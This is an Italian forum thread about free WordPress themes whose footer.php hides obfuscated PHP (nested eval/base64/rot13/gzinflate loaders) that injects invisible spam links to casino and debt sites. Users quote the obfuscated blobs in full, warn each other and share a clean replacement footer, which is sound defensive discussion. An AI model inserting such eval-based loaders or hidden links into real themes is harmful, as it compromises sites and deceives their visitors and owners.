- Home
- Categorie
- Coding e Sistemistica
- Tutti gli altri Gestionali
- Template compromessi, webmaster attenti!!!
-
@adirontack said:
Grazie Paolino,
se ho capito bene, uno scarica un tema già hackerato, non è che ti entrano in un sito per aggiungerti un link giusto?esatto usano il metodo facile, niente hack un semplice tema modificato ad hoc per inserire link e/o eseguire codice maligno
Non è che il sito che citi tu (wp.themes.org.in) è consapevole e/o magari coinvolto?
certo che è coinvolto, è uno dei siti fantoccio messi su per diffondere temi hackerati, da notare che non è un sito ufficiale di Wordpress
-
@paolino said:
nel file footer.php troverete una cosa interessantissima
> <?php @eval(@base64_decode("QGV2YWwoQHN0cl9yb3QxMyhAZ3ppbmZsYXRlKEBiYXNlNjRfZGVjb2RlKCJkVkxOanBzd0VMN25LYWFvYXNnQm82cUhTZzBoa2FKTnBCNmlhcVVlZGkvSWRtMFRpZ0FQWU1sVWZmY2FBMHZiMVhMQk05L1B6SGg4VEpNajd6bTBPVzJVWVJSYW84UDN1YkE3K0hYQ2UyWERVMnNzWmgycXJHRlVJVlZ5d25mNzMzczR6dkxUS0F0NnBmaVhPQzZZMEZ5Z2xFVDFPS0FrRkJVeE5ENDYwdUhUNTJEbmRkcmN3Y1ZCeTVoQ0VhUWJjRi9DMHc4TjQrVWU1cmFNa0NvcnNSTGh6b2tncWFBWDJCNkNDYTR0Nnd4dFdiaDFIVzI5YjVEK0Q5RnF3QWxMNGlvbGNMTVdIa3pYS3drUEtGSGNVWk1rNWk4TnZLMEhJNEVMbG10YkFtY0ZDdFJRbDJ0VHkveEZRWHBYd0ZaVXk3clVLRTFIU2NPRzJOOUhMSTI5bzRncy9zeGxOS1VDVUVaWlBBUVhqOEhUaUlISGd2VHYzRGdDT04vWFJWOHVuWWx1OWZ1NnBJTjBQSjdIbzc4R1AzRVN1eTJrbS9YdlJ5OTROaTBsOUZPNzlMS3JXbUNsRzVFUHRmT2IyZVBMV1BOK1RhdmZJcFJ1ZzAzLzdYSlo5dXlsaGpZMjF3amg5Zkg1L0hTN1BwNXYxKzlBWUJ0UC9KYUpnVGppc3IxL21sMUM3K2M5MzBYUmJJeE56M3hqTkIreUh6a0tnM0lhQnVhSXpFeGxCaFNaVkl5SEh5ZUNSUGZPdFNORWtTOVdNMTJPMVhvMTJIVHpCdz09IikpKSk7")); ?> >```è un codice offuscato, o meglio usa una tecnica di doppio offuscamento se provate a decriptarlo alla fine uscirà Anch'io ho trovato questo codice e ho provato a cancellarlo ma mi fa sparire tutto il footer, come faccio a cacnellare quei link ma a mantenere il footer? Grazie mille
-
lo so purtroppo si son fatti furbi, il codice è offuscato a strati e contiene anche l'html necessario per il corretto rendering
il mio consiglio è di scaricare il tema dal sito ufficiale dell'autore o da quello di Wordpress
-
@paolino said:
lo so purtroppo si son fatti furbi, il codice è offuscato a strati e contiene anche l'html necessario per il corretto rendering
il mio consiglio è di scaricare il tema dal sito ufficiale dell'autore o da quello di Wordpress
Scusa paolino ma ho provato a vedere in giro per la rete ma niente da fare: tutti quelli che ho trovato ho perto il file footer e hanno sempre lo stesso codice.
Hai altri consigli da darmi?
Il template è evening-alone
e qui hai un esempio:
http://wordpresstemplates.name/evening-alone-free-wordpress-template/Grazie mille
-
sfido che non l'hai trovato, a ficcare quel codice offuscato è stato niente di meno che l'autore
http://impulseblogger.loreleiweb.com/wp-content/uploads/2008/03/eveningalone.zip
-
@paolino said:
sfido che non l'hai trovato, a ficcare quel codice offuscato è stato niente di meno che l'autore
http://impulseblogger.loreleiweb.com/wp-content/uploads/2008/03/eveningalone.zip
maledetto quindi niente da fare devo cambiarlo e basta, giusto?
-
@riga75 said:
maledetto quindi niente da fare devo cambiarlo e basta, giusto?
oddio se hai la costanza di decriptare l'intero codice
-
Anch'io mi son trovata in un template un codice chilometrico indecifrabile e in più pubblicità di casinò ecc ecc con la scritta dello stesso colore del footer.
Me ne sono accorta perchè ho scelto un template (non trovandone uno in tema col mio blog) e l'ho voluto adattare alle mie esigenze cambiando header e footer. Nel footer ho trovato la sorpresa. Non riuscivo a capire perchè nel sorgente pagina mi trovavo dei link normali e nel file footer.php non c'erano ma trovavo al loro posto il chilometrico codice. Ho provato a togliere il tutto ma spariva una parte di footer.
Ho risolto eliminando tutto il lunghissimo codice e inserendo nel footer semplice html con i vari link che volevo io, perchè se lasciavo vuoto il footer non mi appariva, in qualche modo dovevo riempirloAlcuni han subìto un ban temporaneo da google per aver lasciato questo SPAM nel footer e a volte si fa fatica anche a trovarlo. Per fortuna che Wordpress mi modera i commenti perchè tramite un commento mi stava entrando altro SPAM nascosto, i furbi.
Se volete dare un'occhiata il blog è questo
*ttp://dolcipiaceri.netsons.orge il tema che ho usato si chiama vivo-vista ed è questo
*ttp://www.wordpressdesigns.net/vivo-vista.htmldate un'occhio ai due footer l'originale e il mio modificato e capirete.
-
@nastrorosa said:
Anch'io mi son trovata in un template un codice chilometrico indecifrabile e in più pubblicità di casinò ecc ecc con la scritta dello stesso colore del footer.
Me ne sono accorta perchè ho scelto un template (non trovandone uno in tema col mio blog) e l'ho voluto adattare alle mie esigenze cambiando header e footer. Nel footer ho trovato la sorpresa. Non riuscivo a capire perchè nel sorgente pagina mi trovavo dei link normali e nel file footer.php non c'erano ma trovavo al loro posto il chilometrico codice. Ho provato a togliere il tutto ma spariva una parte di footer.
Ho risolto eliminando tutto il lunghissimo codice e inserendo nel footer semplice html con i vari link che volevo io, perchè se lasciavo vuoto il footer non mi appariva, in qualche modo dovevo riempirloAlcuni han subìto un ban temporaneo da google per aver lasciato questo SPAM nel footer e a volte si fa fatica anche a trovarlo. Per fortuna che Wordpress mi modera i commenti perchè tramite un commento mi stava entrando altro SPAM nascosto, i furbi.
Se volete dare un'occhiata il blog è questo
*ttp://dolcipiaceri.netsons.orge il tema che ho usato si chiama vivo-vista ed è questo
*ttp://www.wordpressdesigns.net/vivo-vista.htmldate un'occhio ai due footer l'originale e il mio modificato e capirete.
Tagliamo la testa al toro: puoi postrare direttamente il codice che hai messo??
Grazie mille
-
aprendo il file **footer.php **ho trovato questo codice:
i link li ho notati solo per puro caso, guardando il template e selezionando l'area con il tasto sx cliccato..eran nascosti nello sfondo.[php]<?php $__F=FILE;$__C='Pz48ZDR2IDRkPSJmMjJ0NXIiPjxwPg0KDQo8P3BocCBibDJnNG5mMignbjFtNScpOyA/PiA0cyBwMnc1cjVkIGJ5IDwxDQpocjVmPSdodHRwOi8vdzJyZHByNXNzLjJyZyc+VzJyZHByNXNzPC8xPiAtIFRoNW01IGQ1czRnbjVkIGJ5IDwxDQpocjVmPSdodHRwOi8vd3d3Lnc1Ymgyc3Q0bmdyMWxseS5jMm0nPlc1YiBIMnN0NG5nPC8xPi48YnIvPjwxDQpocjVmPSJodHRwOi8vd3d3LmlzaDFkNXN0NW1wbDF0NXMuYzJtIj5XNWJzNHQ1IFQ1bXBsMXQ1czwvMT4gfCA8MQ0KaHI1Zj0iaHR0cDovL3d3dy5wM3BkMmd0cjE0bjRuZy5jMm0iPlAzcHB5IFRyMTRuNG5nPC8xPiB8IDwxDQpocjVmPSJodHRwOi8vd3d3LmlzaDFkNXNyNXM1bGw1ci5jMm0iPlI1czVsbDVyIEgyc3Q0bmc8LzE+Lg0KDQoNCg0KPCEtLSA8P3BocCA1Y2gyIGc1dF9uM21fcTM1cjQ1cygpOyA/PiBxMzVyNDVzLiA8P3BocA0KdDRtNXJfc3QycCg2KTsgPz4gczVjMm5kcy4gLS0+CTwvcD48L2Q0dj48L2Q0dj4NCjw/cGhwIGc1dF9zNGQ1YjFyKCk7ID8+DQo8P3BocCB3cF9mMjJ0NXIoKTsgPz4NCjwvYjJkeT4NCjwvaHRtbD4=';eval(base64_decode('JF9fQz1iYXNlNjRfZGVjb2RlKCRfX0MpOwokX19DPXN0cnRyKCRfX0MsIjEyMzQ1NmFvdWllIiwiYW91aWUxMjM0NTYiKTsKJF9fQz1lcmVnX3JlcGxhY2UoJ19fRklMRV9fJywiJyIuJF9fRi4iJyIsJF9fQyk7CmV2YWwoJF9fQyk7CiRfX0M9IiI7'));?><center><a href="http://www.vegascasinoscd.com">casino gambling</a> & <a href="http://www.bestdebtservices.com">Debt Consolidation</a> & <a href="http://www.officialarmy.com">Army</a></center>[/php]dopo varie prove ho buttato tutto il codice di cui sopra e da ignorante in fatto di php ho scritto tutto il footer che mi serviva in html. Due righe con links e il tasto per il login. ho mantenuto il link di chi ha fatto il template anche se si meriterebbe di toglierlo (ma potrei toglierlo?). E poi ho fatto come lui..ho inserito tre puntini (...) che risultano nascosti, per poter mantenere quel dito di footer che se non mettevo niente mi spariva.. google non si arrabbierà mica per 3 puntini nascosti..
Ecco il footer rifatto
<div id="footer"><p>
Dolci piaceri è stato creato con <a
href='http://wordpress.org'>Wordpress</a> - Tema di <a
href='http://www.webhostingrally.com'>Web Hosting</a><br>Modificato da webmaster <a
href='mailto:[email protected]'>Dolci piaceri</a> - <a href="http://www.dolcipiaceri.netsons.org/wp-login.php?loggedout=true">LOGIN</a>
</p></div></div>
</body>
</html>
<center>...</center>per dare un'occhiata al risultato, trovate l'indirizzo del blog qui sopra nel codice.
-
Il mio footer era criptato, ho risolto il problema aprendo con firefox il file footer.php e copiando il codice sorgente, poi l'ho incollato in dreamweaver ed ho salvato il nuovo footer.php, ora funziona alla grande.
-
Ciao
perdonami ma il tuo post ha dello strano. Anzitutto di che CMS stiamo parlando e successivamente gradirei conoscere che tipo di criptatura o che problema ti dava.Ciao